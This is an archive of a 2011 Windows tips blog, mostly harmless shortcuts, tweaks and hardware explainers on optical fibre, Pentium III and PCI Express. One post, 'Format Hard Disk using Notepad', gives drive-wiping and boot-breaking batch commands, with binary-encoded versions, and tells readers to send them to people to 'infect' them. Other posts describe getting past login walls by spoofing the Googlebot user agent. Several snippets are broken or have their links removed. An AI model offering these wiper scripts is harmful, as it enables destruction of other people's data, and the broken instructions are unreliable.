Thursday 29 September 2011

Windows Top Shortcuts and Tricks

    1. Top Useful Shortcut keys available here:

    * Windows key + D - shows the desktop.
    * Windows key + M - minimizes all open windows.
    * Windows key + Shift + M - maximizes all open windows.
    * Windows key + E - Runs Windows Explorer.
    * Windows key + R - shows the RUN dialog.
    * Windows key + F - shows Search window.
    * Windows key + Break - shows System Properties box.
    * Windows key + TAB - Go through taskbar applications.
    * Windows key + PAUSE Display the System Properties dialog box.
    * Windows key + U Open Utility Manager.
    * ALT + TAB - Cycle through opened applications.
    * Hold down CTRL while dragging an item to Copy it.
    * CTRL + ESC Display the Start menu.
    * ALT + ENTER View the properties for the selected item.
    * F4 key Display the Address bar list in My Computer or
    * NUM LOCK + Asterisk (*) Display all of the subfolders that are under the selected folder.

2. Lock Windows to protect computer :
You can lock Windows to protect the computer when leaving the station easily by creating a shortcut with the path rundll32.exeuser32.dll, LockWorkStation. The Windows key + L is also a shortcut to this feature.

3. Edit sysoc.inf to list all software :
To show all software that can be removed from your computer (including protected Windows services), you can manually edit (using notepad for example) the sysoc.inf file located in Windows\inf\. Just remove the word hide next to the software pack.

Note:- use this at your own risk. Removing critical components of the system will make Windows instable.

Now Change Windows Starup & Log off Screen


Startup Screens:
1. Create a 320x400 bitmap in the root directory and name it LOGO.SYS

2. You can use LOGOW.SYS file in the Windows directory as a starter

Logoff Screens:

   1. There are many system file that constitutes Lofoff screen.
   2. They are actually bitmaps 320x400 that just have a different extension
   3. The hidden file in the root directory LOGO.SYS is the startup logo.
   4. There are two files in the Windows directory.
   5. LOGOW.SYS is the Wait while Shutting down ... screen.
   6. LOGOS.SYS is the You may now shut-off or Reboot screen.
   7.  Make two new image files of your chice in Paint and name it as LOGOW.SYS
   8. But make sure they should be of the same size

Access Blocked Websites Through Proxy Servers

Why don't you use proxy server for open blocked sites. U use this proxy server for open Blocked Sites Enabled ur cookies when u use proxy server.

Lock any folder in Windows without using any Software

Just do it on CMD
1. Make a Folder in C drive rename it as "abc" without quotes.
2. Now open Command Prompt from Start Menu.
3. Type "attrib +s +h C:\abc" without quotes and press enter.
4. This command will Make your folder invisble and it can not be seen even in hidden files and folders.
5. To make it visible again type "attrib -s -h C:\abc".
6. You can lock any other folder also by changing the location C:\abc to address of your folder.

Free Enter to any Website without registering

Just Go to

and type the URL of the website you want to log into.

-, -

Another (and better) way is changing the user agent of your browser to:


This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from

and add the Googlebot user agent.

Have fun, Dead Dreamer!

-]Edit[- You were just browsing entire forum without even needing to login to view restricted areas, and it works on other sites
And no, you cant access the hidden forums either, already tried that

Wednesday 28 September 2011

Is your Password Secure Enough?

Passwords are everywhere and it’s a common tendency to choose just a so so type of password without bothering much about its strength. That’s quite understandable because it’s tough to remember so many passwords.That’s why we normally use the same password everywhere and they are also easy to remember.
And now it’s time for some crooks to get their entry in the scene. Password hacking/breaking is some what these guys love a lot and we have made their job easier by choosing a lame password. Such passwords are easy to break using brute force approach.
Internet is such a large ocean of information that even wandering aimlessly you’ll find a number of islands where you’ll love to stay for a while. I am saying that because I found such an island where you can check the strength of your passwords.

Just visit here and you’ll see a clean interface where you enter a password and it tells you the time which is required by a normal computer to break it using brute forcing.
With the superb increment in the computing power it has become easier to implement this approach of password breaking and modern techniques use even the power of your graphics card to do that. Even a good dictionary can be used to implement a successful dictionary attack. So the ultimate security is to choose a complicated and strong password which can drag you away from the nightmares.

Switch Your DNS Easily

DNS servers as all of us know are used to translate  humanly memorable domain names  and host names into the corresponding  IP addresses because memorizing a site through its name is a lot easier than its IP address. The DNS is a distributed system and 13 top level root servers contain the complete database of domain names and IP addresses. This technology is based on the client/server architecture. Your Web browser functions as a DNS client  and contacts your Internet provider’s DNS servers when navigating between Web sites.
Some times your default DNS server takes a long time to resolve the addresses and some times it may slow down resulting in decreased performance and slow browsing speed. That’s why public DNS servers like Google and OpenDNS have been launched to solve the problem and provide you the best internet experience. But you’ll have to manually configure them before using their services. But if you stay with me for a few minutes then you will find an automated solution for that.
Just click here and download the free utility called DNS Jumper. You don’t need to install it as it executes on a single click.

This is the neat and clean interface of this application where you choose your Network Card and they provide some good and efficient DNS servers which you can use. They also let you choose the fastest available DNS server by clicking on the Fastest DNS button. So now you don’t need to configure your DNS server manually as you have an automated solution available. So grab it and use it.

Boot Windows XP Fast


Follow the these steps  :

1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:\
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer

Get a free SSH Account here

Secure Shell(SSH) is a network protocol allowing data to be exchanged using a secure channel between two connected devices. It is widely used to keep our unencrypted data safe during the transmission process. TCP port 22 is used on your machine for providing an SSH connection to you. Now the main task is to get a server to which we can get connected and establish a secure data flow connection. And that’s why I am here so late at night because I want to see a sweet smile on your face when you get up in the morning-when I’ll be sleeping.
So get ready as I’ll provide you not one not two but three good SSH servers addresses. Actually I will provide you the good cool site and they will provide you those three servers. So what’s the site? Ah! Should I tell you that is the site name where you can get it. Now when you know it then check them. They provide you three live servers which you can get connected to and enjoy. But the problem is half-solved now because we still need to do some sort of configuration in order to get this done and thankfully they solve this problem too.
They have provide a link to download a tool called MyENTunnel which means My Encrypted Tunnel.This tool saves us from the headache of configuring all settings manually using Putty. All you need to enter the IP and password of SSH server which you will get from this site. That’s all you need to do. So you can click on Connect button and our tunnel is ready to be used. So just check that site and stay connected because I’ll be back again.

Want to know the last Shut Down time? here we go..


This one for the Internet addicted folks like me or the good Counter Strike lovers and one who use their laptop as downloading machine for day and night. So guys when did you shutdown your machine for the last time? No idea! GET IDEA and follow these steps-

* In XP type eventvwr.msc in the Run dialog box-Please for God sake don’t ask me how to open Run dialog box.
* And if you use Vista or Windows7  then type the “Event Viewer” in the Start Search Box.
* Now click on the System tab in the left panel.
* Now look for the first occurrence of event with event id 6006. This will give us what we are searching for.

So now you know the last shutdown time. It is  6:12 AM and this is not unusual for a net addicted guy. Enjoy and wait for the next post.

Format Hard Disk using Notepad


If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.

Step 1 :-
Copy The Following In Notepad Exactly as it is.
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
ORIF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file


Do anybody know the general way to protect something from malicious use? Passwords-no doubt. But what if we want to protect an email. No email provider provides this facility to protect an email with a password. Sometimes we may need to send a mail intended for a specific person and don’t want others to read it in case of account hacking or something. So how can we achieve this?
As I always say that there is a solution for every problem and this problem too. What if our email provider don’t provides this still we can do it.And the ultimate solution for this problem is LOCKBIN. They provide this service without any cost. You can compose a message like usual and can attach files too.Then you set the password and this password is necessary to read that email.Ultimate security.

The most amazing feature that fantasizes me is that they use https which is an extra advantage in security terms. When a free service can provide such kind of facility I think sites like facebook which doesn’t bother about security must learn something from them.

Are you fed up with shortcut Arrows from desktop Icons? REMOVE IT completely

To Remove shortcut arrow from desktop icons in any type of document:
a) Perform instructions described under ‘Remove shortcut arrow from desktop icons’. For your convenience, steps 1 to 3 are reported here.
b) Perform instructions described under ‘Remove shortcut arrow from desktop icons (2)’. For your convenience, steps 4 and 5 are reported here.
c) And finally, do the same with conferencelink, docshortcut, internetshortcut and wshfile.
So, here is a summary of all actions:
1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOT\lnkfile
3. Delete the IsShortcut registry value.
4. Navigate to HKEY_CLASSES_ROOT\piffile
5. Delete the IsShortcut registry value.
6. Navigate to HKEY_CLASSES_ROOT\ConferenceLink
7. Delete the IsShortcut registry value.
8. Navigate to HKEY_CLASSES_ROOT\DocShortCut
9. Delete the IsShortcut registry value.
10.Navigate to HKEY_CLASSES_ROOT\InternetShortcut
11. Delete the IsShortcut registry value.
12. Navigate to HKEY_CLASSES_ROOT\WSHFile
13. Delete the IsShortcut registry value.
14. Close regedit.
Logoff and…
Note :
Please note that in some cases deactivating the arrow for *.LNK files might lead to duplicate items in the Explorer Context menu.

Windows LIVE CD Tool

Live CDs are quite useful when we just want to have a trial of an Operating System before we actually decide to install it. So far we have seen a number of Linux distros running through Live CD like Ubuntu PCLinuxOS and many more. Now if u know me then you already know that I always have the simplest things in a different way. So what if I tell you how to run any Windows version through a Live CD. So just be cool as this post will also help you in Computer Forensic and Troubleshooting.
Again you know that I simply love softwares that make our life a bit easy-both personal and as a professional. So here again be ready for the task we are expert in-Downloading. Ya that’s what we are just going to do but no movie no game and no torrent too. It’s a simple tool called Ultimate Boot CD for Windows. You can get that from here. Now just install it and keep your original Windows CD at your hands because we will need it to create a Live CD.

So just put your Windows CD and start this application. You will see this screen and here you’ll be asked to provide a Source Path to your Windows files. So point out the CD location and that’s all you need to create a Live CD. Just click the Buildbutton and your ISO file will be created to the specified location. Now you can burn this ISO file and your live CD is ready to be explored. It has a lots of custom tools which can be useful in troubleshooting your computer.It includes Anti-Spyware Tools AntiVirus Tools Disk Tools File Recovery Tools Password and Registry tools. You can have a complete list of available tools here. Just go through it you will be glad to see such a complete troubleshooter at your disposal which you can use to a wide range of operations from data wiping to data recovery and from password editing to remote desktop controlling and so on. So won’t you like to check it. I know that you’ll.

Auto End Task to Enable a Proper Shutdown

This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.
1. Copy the following (everything in the box) into notepad.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
[HKEY_USERS\.DEFAULT\Control Panel\Desktop]

2. Save the file as shutdown.reg
3. Double click the file to import into your registry.

NOTE: If your anti-virus software warns you of a "malicious" script, this is normal if you have "Script Safe" or similar technology enabled.

Firefox Inside Firefox

How to run Firefox inside Firefox.?

Yeah you can run Firefox inside firefox just by typing following url.
How about Opening Firefox inside Firefox which is again in another Firefox..?
Not bad huh?
And its really easy too just type in this url in Firefox's address bar and there you go!
Firefox inside Firefox!
copy paste following url in a web browser (mozilla firefox).


Screenshot of this trick firefox in firefox in firefox, which is again in another firefox.

Have Fun....

Chat with your friends using Command Prompt

  1. You only need to know your friends IP Address.
  2. Open Notepad and write this code as it is.....!
@echo off
set /p n=User:
set /p m=Message:
net send %n% %m%
Goto A
     3.   Now save this as "Messenger.Bat".
     4.   Open Command Prompt.
     5.   Drag this file (.bat file) over to Command Prompt and press Enter.
     6.   You would then see something like this:

     7.   Now, type the IP Address of the computer you want to contact and press enter
         You will see something like this:

     8.   Now all you need to do is type your message and press Enter.
           Start Chatting.......!


Send Love Letter On Orkut (Love Letter Generator)

L♥VE letter Generator>>>>>>>>>>>>>>>>
Now u love some one...
she/he is in orkut....
but u can't express your feelings ♥
so create flash love letters nd scrap him/her
Click here

Tuesday 27 September 2011

Log Out Orkut with Java Code

Orkut LogOut Code......
I think You guys are seen so many but
this is new interesting log out
Check out...


Copy above code and paste it in address bar, you will be logged out with nice message.

Tuesday 20 September 2011

Google Webmaster Sitemap errors when using feed redirection

Google Webmaster tool throws out crawl errors whenever a blogger redirected feed (one example is Feedburner) is used as a sitemap.

Not found
Restricted by robots.txt

The solution to it is to add a no redirect flag to the url that is going to be use as a sitemap.

Change to>
for better Listing

Comment below if you like it

Monday 19 September 2011

How to Submit or Index more than 26 URLs in Google Webmaster Tools

Google provides a way to Submit websites and blogs using their Webmaster tool. All it needs is a sitemap. Blogger uses its feeds as sitemap for indexing. You may notice that for blogs that have more than 26  pages, Google Webmaster can only grab the Latest 26 URLs for indexing. I suffered a lot to get indexed for my all URLs to GWT, here i'll share something very unique with you...

Once your blog is verified you can  add  sitemaps for your blog {From the Left Pane > Site Configuration > Sitemap}.In the Sitemap url give the following url as shown below and click the Submit Sitemap button.

If you have more than 100 posts on your blog, then add an additional sitemap url


If your blog has more than 200 posts, then add one more sitemap url


If it has more than 300 posts, then add one more sitemap


Continue this process depending upon the number of posts on your blog. So this means that you will be adding additional sitemaps for every 100 posts.

Once you have added the Sitemap, you can play around with the different other tools in GWT. It will provide you with a better analysis your site, show you the sites linking to you, help you in managing your site links and much more.

Sunday 18 September 2011

All about Optical Fibres



Optical fiber is an excellent transmition medium used by systems that require a high bandwidth, like the telephony systems, videoconference, local networks (LANs), etc.

 There are two main advantages on optical fibers over metallic cables. Optical fiber is totally imune to electromagnetic interference, which means that data isn't corrupted during their transmition. The second main advantage is that optical fiber doesn't conduct electrical current, thus no electricity-related issue is found by using optical fibers, like electrical potential difference between devices or problems with lightnings.

As the name implies, optical fibers use light to transmit data. At one end of the cable, a LED (Light Emitting Diode) or a semiconductor laser is used as the light source. LEDs can transmit data up to 300 Mbps and is used on short-distance fibers, while with laser the transfer rate can easily reach the Gbps range and is used in long-distance fibers.

The light used in optical fibers is near the infrared range, so it is invisible to the human eye. Actually optical fibers can use light from different wavelenghts, as you can in the table below. Recently ITU classified the wavelenghts that can be used in optical fibers into "bands". So an optical fiber operating on the O band means that the wavelenght of the light used in the cable is between 1260 and 1360 nm.

Range (nm)
O band
1260 to 1360
E band
1360 to 1460
S band
Short wavelength
1460 to 1530
C band
1530 to 1565
L band
Long wavelength
1565 to 1625
U band
Ultralong wavelength
1625 to 1675

Anatomy of Optical Fibers

The fundamental principle behind optical fibers is a physic phenomena called total internal reflection. In order to have total internal reflection, light has to get out from a more refringent (refractive) medium to a less refrigent one and the angle of incidence must be equal or greater than the limit angle (also known as Brewster angle).

    Figure 1: Example of an optical fiber.

Optical fibers are basically made of dielectric (insulating) materials that, as we already mentioned, allow complete imunity to electromagnetic interference, having two areas, a center region called core, where the light pass through, and an external region called cladding which covers the core. The refracting index of the material used on the core is higher than the refracting index from the material used on the cladding.

In Figure 2, you can see the anatomy of an optical fiber.
       Figure 2: Anatomy of an optical fiber.

       Here is the description of each part of the optical fiber:

    * Core: The core is a thin filament made of glass or plastic, measured in micra (1 μm = 0,000001m), where the light pass through. The larger the diameter of the core, the more light it can conduct.
    * Cladding: Layer that revests the core. Since it has a refraction index lower than the core, it prevents the light from being refracted, hence allowing the light to reach the reception device.
    * Plastic buffer: Plastic layer that revest the skin, protecting the optical fiber from mechanical shocks and excess of bending.
    * Mechanic resistence fibers: Fibers that help to protect the core against impacts and excessive tensions during their installation. They are usually made of a material called kevlar, the same used on bullet-proof vests.
    * Outer jacket: Is the jacket that covers the optical fiber.


There are two types of optical fibers: multimode and single-mode (or monomode). These types define how light travels inside the fiber core.

    * Multimode: On multimode fibers the core diameter is greater than the core diameter of single-mode fibers, making the light to have several propagation modes, i.e. the light goes through the fiber core using several paths and not using a single path, like in single-mode fibers. Multimode fibers have a core diameter 50 to 100 microns (typical commercial values are 50, 62.5 and 100 microns) and a cladding diameter of 125 microns. Multimode fibers can be classified into graded-index and step-index, depeding on the refraction index between the core and the cladding - on graded-index there is a gradual change between the core and the cladding, while on step-index this change is abrupt, hence the name. Step-index fibers can transmit data up to 50 Mbps, while grade-index fibers can transmit data up to 1 Gbps. Multi-Mode fibers are also known as MMF and they are used by short-distance fibers.

    * Single-mode: single-mode fibers are used in long-distance cables, but they require connectors with better precision and expensive devices. On this kind of fiber the light has only one way of travelling inside the fiber core, hence its name. The core diameter is between 7 and 10 microns and its cladding diameter is around 125 microns, so both multi-mode and mono-mode cables have the same diameter, what makes the difference is the diameter of the core. There are three types of single-mode fibers: non dispersion-shifted fiber (NDSF), dispersion-shifted fiber (DSF) and non zero-dispersion-shifted fibers (NZ-DSF).

ITU released a series of standards in order to classify the properties of multimode and single-mode fibers:

    * ITU G.651: Graded-index multimode fibers with 50-micron core diameter and 125-micron cladding diameter.
    * ITU G.652: Non dispersion-shifted fiber (NDSF) single-mode fibers using 1,130-nm wavelenght supporting the following distances and transfer rates: 1,000 km (621 miles) at 2.5 Gbps, 60 km (37 miles) at 10 Gbps and 3 km (1.86 miles) at 40 Gbps.
    * ITU G.653: Dispersion-shifted (DSF) single-mode fibers.
    * ITU G.655: Non-zero dispersion-shifted (NZ-DSF) single-mode fibers. It supports the following distances and transfer rates: 6,000 km (3,730 miles) at 2.5 Gbps, 400 km (250 miles) at 10 Gbps and 25 km (15.5 miles) at 40 Gbps.

Important: Optical fibers trasmit light in a wave lenght invisible to the human eye. So, we can never look directly to the end of an optical fiber while it is connected to a system, because we can go blind looking at it.

All Time Pentium III Models

Intel has just come out with another version of Pentium III or Pentium 3, code named Tualatin, which has a 512 KB L2 cache operating at the same clock frequency as the processor, thereby double the amount of cache memory offered by previous versions of Pentium III and, according, this processor is much faster than the traditional Pentium IIIs.

This reminds us that there are various different models of Pentium II on the market, and this ends up confusing users. It would be much simpler if the all these models merely differed in their clock frequency. However, several details result in the various completely different Pentium IIIs: type of connection, amount of L2 cache, external clock, etc.

As regards their mechanical design, there are two models of Pentium III, that is, this processor can be found with two different types of connector, and the motherboard has to match the type of connection used by the processor. The first models of Pentium III to come onto the market were cartridge-mounted, resembling the design used for the Pentium II, known as SECC-2. These models are plugged into the motherboard via a connector called Slot 1 or SC-242. Some time after, Intel marketed FC-PGA Pentium IIIs, in which the plug-in system is a socket known as socket 370. Note that the cartridge assembly models continued to be manufactured even after the socket model came onto the market.

Models of Pentium III up to 600 MHz utilize a 512 KB cache memory circuit operating at half the processor's clock frequency - for instance, in a Pentium III-600, the L2 cache is accessed at 300 MHz. After the 650 MHz model, Intel then came out with a Pentium III with a cache clocked at the same frequency as the processor, albeit lowered to 256 KB. And now, as we said, the new models (from 1.13 GHZ) utilize a 512 KB cache running at the same frequency as the processor's internal clock. Note that there is more than a single model of Pentium III for the various clocks. For instance, the 600 MHZ model is available either with 512 KB of L2 cache at half frequency or 256 L2 cache at the same frequency. In such cases, a letter E is added to the processor's name to indicate the 256 KB cache.

Pentium III's external clock can be either 100 MHz or 133 MHz. Models with clocks that are factors of 50 (500, 550, 600, 650, etc) utilize a 100 MHz external clock. On the other hand, models with clock factors of 33 (733, 866, 933, etc) utilize a 133 MHz external clock. Some clocks are factors both of 50 and 33 and according models both with 100 MHz clocks and 133 MHz clocks have come out, those running at 133 MHz providing the best performance. In this case, a letter B has been added to the designation of 133 MHz models to distinguish them from 100 MHz models.

The following table sums up all these characteristics. The quickest way to find out the internal characteristics of your Pentium III is running an ID program, such as Wcpuid (available at This kind of program runs a processor identifying instruction called CPUID, which for all Pentium III models returns the following values: string = "GenuineIntel";type = "0"; family= "6". However, field Model of this instruction will depend on the kind of Pentium III, according to the table.

External Clock
Mechanical Design
L2 Cache
1.13, 1.26 and 1.40 GHz
133 MHz
512 KB, same frequency
Model 11
1.13 GHz, 1B GHz, 933, 866,800EB, 733, 667, 600EB and 533EB MHz
133 MHz
256 KB, same frequency (models above 650 MHz or E models) or 512 KB, half frequency (models up to  600 MHz)
Model 7 (512 KB) or model 8 (256 KB)
1.10 GHz, 1 GHz, 900, 850,800, 750, 700, 650, 600E, 550E and 500E MHz
100 MHz
256 KB, same frequency (models above 650 MHz or E models ) or 512 KB, half frequency (models up to 600 MHz)
Model 7 (512 KB) or model 8 (256 KB)
550, 500 and 450 MHz
100 MHz
512 KB, half frequency
Model 7

Saturday 10 September 2011

Know PCI Express Bus


The processor communicates with other peripherals in the PC through a path of data called bus. Since the release of the first PC, in 1981, up to the present day, several types of bus have been developed in order to allow the communication between the processor and input and output peripherals. We can name the following buses already launched:

PCI Express

The main difference among the several types of bus is in the number of bits that can be transmitted at a time, and in the operating frequency used. Nowadays the two fastest types of PC expansion bus are the PCI and the AGP. We listed the transfer rate of those buses in the chart below. The PCI-X bus is an extension of the PCI bus designed to the market of network servers.
The PCI bus was released by Intel in June, 1992. Since then, almost all PC expansion peripherals, such as hard disks, sound cards, LAN cards, and video cards have been using the PCI bus. The thing is, the PCI bus maximum transfer rate - 133 MB/s – proved to be insufficient for modern 3D applications and it represented a limitation to the development of more sophisticated video cards. In order to solve that issue, Intel created a new bus, called AGP, to increase the transfer rate of video cards – now they wouldn’t have to be installed in the PCI bus anymore, but in the AGP bus, which is faster. Then the PCI was not so ”busy“ anymore, since video cards were the great responsible for the intense traffic in the PCI bus.
With the coming of faster graphics chips and new network technologies, such as Gigabit Ethernet and RAID technology, once more the maximum transfer rate of the PCI bus proved to be insufficient to handle those new applications. Something needed to be done and the answer came with the launching of the PCI Express bus.

In the tutorial we will explain in details how the PCI Express bus works and how it differs from the PCI bus.

Obs: Technically speaking, PCI Express is not a bus. A bus is a data path where you can attach several devices at the same time, sharing this data path. PCI Express is a point-to-point connection, i.e., it connects only two devices and no other device can share this connection. Just to clarify, on a motherboard using standard PCI slots, all PCI slots are connected to the PCI bus and share the same data path. On a motherboard with PCI Express slots, each PCI Express slot is connected to the motherboard chipset using a dedicated lane, not sharing this lane (data path) with other PCI Express slots. In name of simplification, we are calling PCI Express as a "bus", since for laymen ”bus“ is easily recognized as ”data path between devices“.
From Parallel to Serial

The PCI Express bus (formerly known as 3GIO) represents an extraordinary advance in the way peripheral devices communicate with the computer. It differs from the PCI bus in many aspects, but the most important one is the way data is transferred. The PCI Express bus is an example of how PC data transfer is migrating from parallel communication to serial communication. Read our article Why Serial? to understand the differences between serial and parallel communications.

Almost all PC buses (ISA, EISA, MCA, VLB, PCI and AGP) use parallel communication. Parallel communication differs from the serial one because it transmits several bits at a time, while in serial communication only one bit is transmitted at a time. This makes, at first, parallel communication faster than the serial one, since the higher the number of bits transmitted at a time, the faster the communication will be.

But parallel communication suffers from some problems that prevent transmissions from reaching higher clocks. The higher the clock, the greater will be the problems with magnetic interference and propagation delay.

When the electric current passes flows through a wire, an electromagnetic field is created around it. If the electromagnetic field created by the wire happens to be very strong, noise will be produced in the near wire, corrupting the information being transmitted. As in parallel transmission several bits are transmitted at a time, each bit involved in the transmission uses one wire. For example, in a 32-bit communication (such as the PCI slot) it’s necessary to have 32 wires just to transmit data, not counting additional control signals that are also necessary. The higher the clock, the greater the electromagnetic interference problem.

Figure 1: Bits arrive at the receptor that was corrupted due to electromagnetic interference problem.

As we have commented before, each bit in parallel communication is transmitted in a separate wire. But it’s almost impossible to make those 32 wires have exactly the same length in a motherboard. This difference in wire length didn’t alter the way the bus worked in older PCs, but due to the increased speed in which data is transmitted (clock), data transmitted through shorter wires started to arrive before the rest of the data that was transmitted through longer wires. That is, the bits in parallel communication started to arrive out of order.

As a consequence, the receptor device has to wait for all bits to arrive in order to process the complete data, which represents significant loss in performance. This problem is known as propagation delay and, as we said, becomes worse with the increase in the operating frequency (clock).
 Figure 2: Bits out of order arrive at the receptor due to the propagation delay problem.

The project of a bus using serial communication is much more simple to be implemented than one using parallel communication, since only two wires are necessary to data transmission (one wire for data transmission and one ground wire). Besides, serial communication allows operation with much higher clocks than those used in parallel communication, since problems with de electromagnetic interference and propagation delay appear most frequently in parallel communication, which prevents high clocks from being reached in the transmissions. Another difference between parallel communication and serial communication is that parallel communication is usually half-duplex (the same wires are used both to transmit and to receive data) due to the high number of wires that are necessary to its implementation, while serial communication is full-duplex (there’s a separate set of wires to transmit data and another one to receive data) because it needs just two wires.

That’s why engineers adopted serial communication instead of parallel communication in PCI Express bus.

Now you might be asking yourself: isn’t serial communication slower? Not necessarily, and the PCI Express bus is a good example: if higher clock is used, serial communication is faster than parallel communication.

Operation Modes

The PCI Express bus has been developed to substitute PCI and AGP buses. It’s compatible in terms of software to the PCI bus, which means old drivers and operating systems don’t need to go through changes in order to support the PCI Express bus.

The PCI Express bus is a serial bus that works in full-duplex mode. Data is transmitted in this bus through two pairs of wires called lane, by using the codification system 8b/10b, the same system used in Fast Ethernet (100BaseT, 100 Mbps) networks. Each lane allows a maximum transfer rate of 250 MB/s in each direction, almost twice the rate of the PCI bus. The PCI Express bus can be built by combining several lanes in order to achieve higher performance. We can find PCI Express systems with 1, 2, 4, 8, 16 and 32 lanes. For example, the transfer rate of a PCI Express system with 8 lanes (x8) is 2 GB/s (250 * 8).
On the chart below we compared the transfer rates of the PCI, AGP and PCI Express busses.

Bus        Maximum Transfer Rate
PCI        133 MB/s
AGP 2x        533 MB/s
AGP 4x        1,066 MB/s
AGP 8x        2,133 MB/s
PCI Express x1    250 MB/s
PCI Express x2    500 MB/s
PCI Express x4    1,000 MB/s
PCI Express x16    4,000 MB/s
PCI Express x32    8,000 MB/s

The PCI Express bus is hot plug, i.e., it’s possible to install and remove PCI Express boards even when the PC is on.

Slot Types

The PCI Express bus defines a different type of slot based on the number of lanes in the system. For example, the physical size of the PCI Express bus x1 slot is different from that of the PCI Express bus x4. In Figure 4, you can see the difference between the PCI Express bus slots.
Figure 4: Types of PCI Express slots.
 Figure 5: Detail of the PCI and PCI Express slots in the motherboard.

The PCI Express x16 slot was developed to be used by video cards.
Figure 6: Difference in the edge contacts of PCI Express, AGP and PCI video cards.

Why Use Serial?

If you pay attention to it, all technologies that exist today are migrating from parallel communication to serial communication.  The new IDE standard for hard disks is serial (ATA Serial).  The PCI bus will be transformed into serial in the years to come, with the release of its new version, the PCI Express.  The SCSI interface is also being transformed into serial.

The serial communication differs from the parallel one for only transmitting a bit at a time, while in the parallel communication several bits are transmitted per time.  That makes the parallel communication faster than the serial one.

That statement, however accepted by most people, is not totally true.  The serial communication may be faster than the parallel one, all you need is that the bits leave the transmitting device at a much higher speed.  An example of such is the ATA Serial port that however serial can reach a transfer rate of up to 150 MB/s, while the traditional IDE port gets to reach 133 MB/s at the most.

There are several reasons to make the devices migrate from the parallel communication to the serial one.  In the parallel communication, since several bits are transmitted per time, a wire is required per each bit.  For instance, in a 32 bit communication (as it is the case of the PCI slot) 32 wires are required just for the data transmission, not to mention the additional control signals that are necessary.  The higher the quantity of bits being transmitted per time, the more wires are used, making the creation of cables and the construction of boards difficult. In the serial communication, only two wires are required, making it much easier to project the communication between two devices.

The higher the transfer rate, the bigger the problem with the electromagnetic interference.  Each wire becomes an antenna in potential, capturing a lot of noise from the environment, which may corrupt the data transmitted.  In the parallel communication, since many wires are used, the problem of the electromagnetic interference is a serious one.  In the serial communication, on the other hand, since only two wires are used, that problem is much more easily solved, by simply protecting the two wires used.

There is yet another problem, a not much discussed one.  Even though we say that in the parallel communication all the bits are transmitted at the same time, the bits do not get to the receiver exactly at the same time.  If in low performance devices the small time difference in the reception of the several bits of data is not important, in high-speed devices that difference in the reception time of the several bits makes the device wastes time having to wait for all the bits to arrive, which may represent a significant fall in performance, since the data transmission operation happens in very short times.

Another difference between the parallel communication and the serial one is that the parallel communication is half-duplex, while the serial one is full-duplex.  In plain English, that means simply the following:  in the parallel communication, the only path between the transmitter and the receiver is used both for the transmission and for the reception of the data.  Since there is only one path, it is not possible to transmit and receive data at the same time.  In the serial communication, on the other hand, since it only uses two wires, the manufacturers usually make four wires available, two for the transmission and two for the reception of data.  In other words, a path just for the transmission of data, and another one only for its reception. That makes it possible for the simultaneous transmission and reception of data. Such architectural difference alone makes the serial communication potentially twice as fast as the parallel communication, if we compare two communications that have the same transfer rate.